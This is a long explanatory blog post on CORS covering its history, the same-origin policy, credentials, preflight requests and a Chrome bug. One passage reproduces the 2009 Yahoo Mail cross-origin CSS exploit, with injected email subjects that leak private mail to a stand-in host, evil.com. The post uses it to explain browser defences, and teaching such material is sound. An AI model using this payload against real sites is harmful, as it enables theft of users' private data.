How to win at CORS

The ‘how’ and ‘why’ of CORS, from start to finish.

CORS is hard. It's hard because it's part of how browsers fetch stuff, and that's a set of behaviours that started with the very first web browser over thirty years ago. Since then, it's been a constant source of development; adding features, improving defaults, and papering over past mistakes without breaking too much of the web.

Anyway, I figured I'd write down pretty much everything I know about CORS, and to make things interactive, I built an exciting new app:


You can dive right into the playground now if you want, but I'll link to it throughout the article to demonstrate particular examples.

Anyway, I'm getting ahead of myself. Before I get to any of the 'how', I'm going to try to explain why CORS is the way it is, by looking at how it came into existence, and how it fits into other kinds of fetches. Wish me luck…

Cross-origin access without CORS

I’d like to propose a new, optional HTML tag: IMG. Required argument is SRC=”url”.

Marc Andreessen in 1993

Browsers have been able to include images from other sites for almost 30 years. You don't need the other site's permission to do this, you can just do it. And it didn't stop with images:

<script src=""></script>
<link rel="stylesheet" href="" />
<iframe src=""></iframe>
<video src=""></video>
<audio src=""></audio>

APIs like these let you make a request to another website and process the response in a particular way, without the other site's consent.

This started getting complicated in 1994 with the advent of HTTP cookies. HTTP cookies became part of a set of things we call credentials, which also includes TLS client certificates, and the state that automatically goes in the Authorization request header when using HTTP authentication (if you've never heard of this, don't worry, it's shite).

Credentials mean web content can be tailored for a particular user. It's how Twitter shows you your feed, it's how your bank shows you your accounts.

When you request other-site content using one of the methods above, it sends along the credentials for the other-site. And over the years that's created a colossal sackload of security issues.

<img src="https://your-bank/your-profile/you.jpg" />

If the above image loads, I get a load event. If it doesn't load, I get an error event. If that differs depending on if you're logged in or not, that tells me a lot about you. I can also read the width and height of the image, which, if it differs from user to user, tells me even more.

This gets worse with a format like CSS, which has more capabilities, but doesn't immediately fail on parse errors. In 2009 it turned out Yahoo Mail was vulnerable to a fairly simple exploit. The attacker sends the user one email with a subject including ');}, and later another with a subject including {}html{background:url('//evil.com/?:

<li class="email-subject">Hey {}html{background:url('//evil.com/?</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">Yo );}</li>

This means some of the user's private email data is sandwiched between something that will parse as a valid bit of CSS. Then, the attacker convinces the user to visit a page containing:

<link rel="stylesheet" href="https://m.yahoo.com/mail" />

…which is loaded using yahoo.com's cookies, the CSS parses, and sends private information to evil.com. Oh no.

And that's just the tip of the shitberg. From browser bugs to CPU exploits, these leaky resources have given us decades of problems.

Locking things down

It's become pretty clear that the above was a mistake in the design of the web, so we no longer create APIs that can process these kinds of requests. Meanwhile, we've spent the last few decades patching things up as best we can:

  • CSS from another origin (I'll get to a definition of 'origin' shortly) now needs to be sent with a CSS Content-Type. Unfortunately we can't enforce the same thing for scripts and images, or CSS on quirks mode pages, without breaking significant portions of the web. However…
  • We prevent particular response types from another origin being loaded as image/script/etc., such as HTML, JSON, and XML (except SVG). This protection is called CORB.
  • More recently, we don't send cookies along with the request from site-A to site-B, unless site-B has opted-in using the SameSite cookie attribute. Without cookies, the site generally returns the 'logged-out' view, without private data.
  • Firefox and Safari go a step further, and try to fully isolate sites, although how this works is currently pretty different between the two.

The same-origin policy

Back in 1995, Netscape 2 landed with two amazing new features: LiveScript (you probably know this better as 'JavaScript'), and HTML frames. Frames let you embed one page in another, and LiveScript could interact with both pages.

Netscape realised that this presented a security issue; you don't want an evil page to be able to read the DOM of your banking page, so they decided that cross-frame scripting would only be allowed if both pages had the same origin.

https://jakearchibald.com:443
/2021/blah/?foo#bar
The origin

The idea was that sites on the same origin are more likely to have the same owner. That wasn't completely true, since a lot of sites divided content by URLs such as http://example.com/~jakearchibald/, but the line had to be drawn somewhere.

From that point, features that granted deep visibility into a resource were limited to same-origin. This included new ActiveXObject('Microsoft.XMLHTTP') which first appeared in IE5 in 1999, and later became the web standard XMLHttpRequest.

Origins vs sites

Some web features don't deal with origins, they deal with 'sites'. For instance, https://help.yourbank.com and https://profile.yourbank.com are different origins, but they're the same site. Cookies are the most common feature that operate at a site level, as you can create cookies that are sent to all subdomains of yourbank.com.

But how does the browser know that https://help.yourbank.com and https://profile.yourbank.com are part of the same site, but https://yourbank.co.uk and https://jakearchibald.co.uk are different sites? I mean… they all have three parts separated by dots.

Well, the answer was a bunch of heuristics in each browser, but in 2007 Mozilla swapped their heuristics for a list. That list is now maintained as a separate community project known as the public suffix list, and it's used by all browsers and many other projects.

If someone says they understand the security implications of URLs without UI hints, be sure to check they can recite all 9000+ entries of the public suffix list from memory.

Origin:
https://app.jakearchibald.com
Site:
jakearchibald.com

Origin:
https://other-app.jakearchibald.com
Site:
jakearchibald.com
Same origin:
Same site:

The above uses a live version of the public suffix list, but I had to proxy it because the actual list doesn't use CORS. The irony.

So https://app.jakearchibald.com and https://other-app.jakearchibald.com are part of the same site, but https://app.glitch.me and https://other-app.glitch.me are different sites. These cases are different because glitch.me is on the public suffix list whereas jakearchibald.com is not. This is 'correct', because different people 'own' the subdomains of glitch.me, whereas I own all the subdomains of jakearchibald.com.

Opening things up again

Ok, so we've got these APIs like <img> that can access resources from other origins, but visibility into the response is limited (but not limited enough in hindsight), and we've got these more powerful APIs like cross-frame scripting and XMLHttpRequest which only work same-origin.

How could we allow those more powerful APIs to work across origins?

Remove credentials?

Let's say we provide an opt-in so the request is sent without credentials. The response will be the 'logged-out' view, so it won't contain any private data, and can be revealed without concern, right?

Unfortunately there're a lot of HTTP endpoints out there that 'secure' themselves using things other than browser credentials.

A lot of company intranets assume they're 'private' because they're only accessible from a particular network. Some routers and IoT devices assume they're only accessible by well-meaning folks because they're restricted to your home network (remember, the 's' in 'IoT' stands for security). Some websites offer different content depending on the IP address they're accessed from.

So, if you visit my website from your home, I could start making requests to common hostnames and IP addresses, looking for insecure IoT devices, looking for routers using default passwords, and generally make your life very miserable, all without needing browser credentials.

Removing credentials is part of the solution, but it isn't enough on its own. There's no way to know that a resource contains private data, so we need some way for the resource to declare "hey, it's fine, let the other site read my content".

Separate resource opt-in?

The origin could have some special resource that details its permissions regarding cross-origin access. That's the security model Flash went with. Flash looked for a /crossdomain.xml in the root of the site that looked like this:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "https://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="*.example.com" />
  <allow-access-from domain="www.example.com" />
  <allow-http-request-headers-from domain="*.adobe.com" headers="SOAPAction" />
</cross-domain-policy>

There are a few issues with this:

  • It changes the behaviour for the whole origin. You can imagine a similar format that lets you specify rules for particular resources, but the resource would start to get quite large.
  • You end up with two requests, one for the /crossdomain.xml, and one for the actual resource. This becomes more of an issue the bigger /crossdomain.xml gets.
  • For larger sites built by multiple teams, you end up with issues over ownership of /crossdomain.xml.

In-resource opt-in?

To cut down the number of requests, the opt-in could be granted within the resource itself. This technique was proposed by the W3C Voice Browser Working Group back in 2005, using an XML processing instruction:

<?access-control allow="*.example.com" deny="*.visitors.example.com"?>

But what if the resource wasn't XML? Well, the opt-in would need to be in a different format.

This is kinda where things landed for frame-to-frame communication. Both sides opt-in using postMessage, and can declare the origin they're happy to communicate with.

But what about accessing the raw bytes of the resource? In that case it doesn't make sense to use resource-specific metadata for the opt-in. And besides, HTTP already has a place for resource metadata…

HTTP header opt-in

The proposal by the Voice Browser Working Group was generalised using HTTP headers, and that became CORS.

Access-Control-Allow-Origin: *

Making a CORS request

Most modern web features require CORS by default, such as fetch(). The exception is modern features that are designed to support older features that don't use CORS, e.g., <link rel="preload">.

Unfortunately there's no easy rule for what does and doesn't require CORS. For example:

<!-- Not a CORS request -->
<script src="https://example.com/script.js"></script>
<!-- CORS request -->
<script type="module" src="https://example.com/script.js"></script>

The best way to figure it out is to try it and look at network DevTools. In Chrome and Firefox, cross-origin requests are sent with a Sec-Fetch-Mode header which will tell you if it's a CORS request or not. Unfortunately Safari hasn't implemented this yet.

Try it in the CORS playground – When you make the request, it'll log the headers the server received. If you're using Chrome or Firefox you'll see Sec-Fetch-Mode set to cors in there, along with some other interesting Sec- headers. However, if you make a no-CORS request, Sec-Fetch-Mode will be no-cors.

If an HTML element causes a no-CORS fetch, you can use the badly-named crossorigin attribute to switch it to a CORS request.

<img crossorigin src="" />
<script crossorigin src=""></script>
<link crossorigin rel="stylesheet" href="" />
<link crossorigin rel="preload" as="font" href="" />

When you switch these over to CORS, you get more visibility into the cross-origin resource:

With <link rel="preload">, you need to ensure it uses CORS if the eventual request will also use CORS, otherwise it won't match in the preload cache, and you'll end up with two requests.

CORS requests

By default, a cross-origin CORS request is made without credentials. So, no cookies, no client certs, and no automatic Authorization header, and Set-Cookie on the response is ignored. However, same-origin requests include credentials.

By the time CORS was developed, the Referer header was frequently spoofed or removed by browser extensions, so a new header, Origin, was created, which provides the origin of the page that made the request.

Origin is generally useful, so it's been added to lots of other types of request, such as WebSocket and POST requests. Browsers tried adding it to regular GET requests too, but it broke a bunch of sites that assumed the presence of the Origin header means it's a CORS request 😬. Maybe one day.

Try it in the CORS playground – When you make the request, it'll log the headers the server received, which will include Origin. If you make a no-CORS GET request, the Origin header isn't sent, but it appears again if you make a no-CORS POST request.

CORS responses

To pass the CORS check and give the other origin access to the response, the response must include this header:

Access-Control-Allow-Origin: *

The * can be replaced with the value of the request's Origin header, but * works for any requesting origin provided the request is sent without credentials (more on that in a bit). As with all headers, the header name is case-insensitive, but the value is case sensitive.

Try it in the CORS playground:

A valid value gives the other origin access to the response body, and also a subset of the headers:

  • Cache-Control
  • Content-Language
  • Content-Type
  • Expires
  • Last-Modified
  • Pragma

The response can include another header, Access-Control-Expose-Headers, to reveal additional headers:

Access-Control-Expose-Headers: Custom-Header-1, Custom-Header-2

The matching is case-insensitive since header names are case-insensitive . You can also use:

Access-Control-Expose-Headers: *

…to expose (almost) all the headers, if the request is sent without credentials (more on that in a bit).

The Set-Cookie and Set-Cookie2 (a deprecated failed 'sequel' to Set-Cookie) headers are never exposed to avoid leaking cookies across sites.

Try it in the CORS playground:

Is it safe to expose resources via CORS?

Access-Control-Allow-Origin: * only grants response visibility if the request is made without credentials, so it's totally safe to use on all resources unless that resource contains private data that's 'secured' using something other than browser credentials.

If you are securing things using something other than browser credentials, stop doing that. It's not actually secure. Platform apps will be able to get at that data and send it wherever they want.

Open the resource in an incognito/private browser tab. Are you happy with other sites having access to that, including the source and the response headers listed above? Then it's safe to expose it via CORS.

Adding credentials

Cross-origin CORS requests are made without credentials by default. However, various APIs will allow you to add the credentials back in.

With fetch:

const response = await fetch(url, {
  credentials: 'include',
});

Or with HTML elements:

<img crossorigin="use-credentials" src="" />

However, this makes the opt-in stronger. The response must contain:

Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://jakearchibald.com
Vary: Cookie, Origin

If the CORS request includes credentials, the response must include the Access-Control-Allow-Credentials: true header, and the value of Access-Control-Allow-Origin must reflect the request's Origin header (* isn't an acceptable value if the request has credentials).

The opt-in is stronger because, well, exposing private data is risky, and should only be done for origins you really trust.

The same-site rules around cookies still apply, as do the kinds of isolation we see in Firefox and Safari. But these only come into effect cross-site, not cross-origin.

Try it in the CORS playground – This request meets all the criteria, and also sets a cookie. If you make the request a second time, you'll see the cookie being sent back.

Why Vary?

Vary: Cookie, Origin

It's important to use the Vary header if your response is cacheable in any way. And not just by the browser, but also intermediate things like a CDN. Use Vary to tell browsers and intermediates that the response is different depending on particular request headers.

Although the Origin request header doesn't result in a different response body, it does change the response headers (Access-Control-Allow-Origin in this case), so it needs to go in Vary.

Unusual requests and preflights

So far, the response has been opting into exposing its data. All of the requests have been assumed to be safe, because they're not doing anything unusual.

fetch(url, { credentials: 'include' });

There's nothing unusual about the above, because the request is really similar to what an <img> can do already.

fetch(url, {
  method: 'POST',
  body: formData,
});

There's nothing unusual about the above, because the request is really similar to what a <form> can already do.

fetch(url, {
  method: 'wibbley-wobbley',
  credentials: 'include',
  headers: {
    fancy: 'headers',
    'here-we': 'go',
  },
});

Ok, that's pretty unusual.

What counts as 'unusual' is pretty complicated, but at a high level, if it's the kind of request that other browser APIs don't generally make, then it's unusual. At a lower level, if the request method isn't GET, HEAD, or POST, or it includes headers or header values that aren't part of the safelist, then it counts as unusual. In fact, I made a change to this part of the spec recently to add particular Range headers to this list.

If you try to make an unusual request, the browser first asks the other origin if it's ok to send it. This process is called a preflight.

Preflight request

Before making the main request, the browser makes a preflight request to the destination URL with a method of OPTIONS, and headers like this:

Access-Control-Request-Method: wibbley-wobbley
Access-Control-Request-Headers: fancy, here-we
  • Access-Control-Request-Method – The HTTP method that the main request will use. This is included even if the method isn't unusual.
  • Access-Control-Request-Headers – The unusual headers that the main request will use. If there are no unusual headers, this header isn't sent.

The preflight request never includes credentials, even if the main request will.

Preflight response

The server responds to indicate whether it's happy for the main request to go ahead, using headers like this:

Access-Control-Max-Age: 600
Access-Control-Allow-Methods: wibbley-wobbley
Access-Control-Allow-Headers: fancy, here-we
  • Access-Control-Max-Age – The number of seconds to cache this preflight response, to avoid the need for further preflights to this URL. The default is 5 seconds. Some browsers have an upper-limit on this. In Chrome it's 600 (10 minutes), and in Firefox it's 86400 (24 hours).
  • Access-Control-Allow-Methods – The unusual methods to allow. This can be a comma-separated list, and values are case-sensitive. If the main request is to be sent without credentials, this can be * to allow any method. You can't allow CONNECT, TRACE, or TRACK as these are on a 🔥💀 FORBIDDEN LIST 💀🔥 for security reasons.
  • Access-Control-Allow-Headers – The unusual headers to allow. This can be a comma-separated list, and values are case-insensitive since header names are case-insensitive. If the main request is to be sent without credentials, this can be * to allow any header that isn't on a 🔥💀 DIFFERENT FORBIDDEN LIST 💀🔥.

Headers in the 🔥💀 FORBIDDEN LIST 💀🔥 are headers that must remain in the browser's control for security reasons. They're automatically (and silently) stripped from CORS requests and Access-Control-Allow-Headers.

The preflight response must also pass a regular CORS check, so it needs Access-Control-Allow-Origin, and also Access-Control-Allow-Credentials: true if the main request is to be sent with credentials.

If the intended method is allowed, and all the intended headers are allowed, then the main request goes ahead.

Oh, and the preflight only gives the go-ahead for the request. The eventual response must also pass a CORS check.

There's a Chrome bug with method names

Chrome has a bug here that I didn't know about until writing this post.

HTTP method names are somewhat case sensitive. I say 'somewhat' because if you use a method name that's a case-insensitive match for get, post, head, delete, options, or put then it's automatically uppercased, but other methods maintain the casing you use.

Unfortunately, Chrome expects the value to be uppercased in Access-Control-Allow-Methods. If your method is Wibbley-Wobbly and the preflight responds with:

Access-Control-Allow-Methods: Wibbley-Wobbley

…it'll fail the check in Chrome. Whereas:

Access-Control-Allow-Methods: WIBBLEY-WOBBLEY

…will pass the check in Chrome (and it'll make the request with the Wibbley-Wobbley method), but it'll fail in other browsers which are following the spec. To work around it, you can provide both methods:

Access-Control-Allow-Methods: Wibbley-Wobbley, WIBBLEY-WOBBLEY

…or just use * if it's a request without credentials.

Ok, let's put all of that together, for one last time, in the CORS playground:

  • A simple request. This doesn't require a preflight.
  • An unusual header. This triggers a preflight, and the server doesn't allow the request. I'm using status code 405 here which means "method not allowed", but the code you use doesn't actually matter.
  • An unusual header, again, but this time the preflight is correctly configured, so the request goes through.
  • A normal Range header. This relates to the spec change I made. When browsers implement the change, this request won't need a preflight. It's currently implemented in Chrome Canary.
  • An unusual method. This highlights the Chrome bug documented above. The request won't go through in Chrome, but it'll work in other browsers.
  • An unusual method, again. This works around the Chrome bug.

Phew!

Whoa, you made it to the end! Sorry, this post ended up way longer than I intended, but I hope it helps make sense of the whole CORS thing.

A huge thanks to Anne van Kesteren, Simon Pieters, Thomas Steiner, Ethan, and Matt Hobbs for proof-reading, fact-checking, and spotting bits that needed more detail.


Print Share Comment Cite Upload Translate
APA
Jake Archibald's blog | Sciencx (2024-03-29T04:59:23+00:00) » How to win at CORS. Retrieved from https://www.scien.cx/2021/10/12/how-to-win-at-cors/.
MLA
" » How to win at CORS." Jake Archibald's blog | Sciencx - Tuesday October 12, 2021, https://www.scien.cx/2021/10/12/how-to-win-at-cors/
HARVARD
Jake Archibald's blog | Sciencx Tuesday October 12, 2021 » How to win at CORS., viewed 2024-03-29T04:59:23+00:00,<https://www.scien.cx/2021/10/12/how-to-win-at-cors/>
VANCOUVER
Jake Archibald's blog | Sciencx - » How to win at CORS. [Internet]. [Accessed 2024-03-29T04:59:23+00:00]. Available from: https://www.scien.cx/2021/10/12/how-to-win-at-cors/
CHICAGO
" » How to win at CORS." Jake Archibald's blog | Sciencx - Accessed 2024-03-29T04:59:23+00:00. https://www.scien.cx/2021/10/12/how-to-win-at-cors/
IEEE
" » How to win at CORS." Jake Archibald's blog | Sciencx [Online]. Available: https://www.scien.cx/2021/10/12/how-to-win-at-cors/. [Accessed: 2024-03-29T04:59:23+00:00]
rf:citation
» How to win at CORS | Jake Archibald's blog | Sciencx | https://www.scien.cx/2021/10/12/how-to-win-at-cors/ | 2024-03-29T04:59:23+00:00
https://github.com/addpipe/simple-recorderjs-demo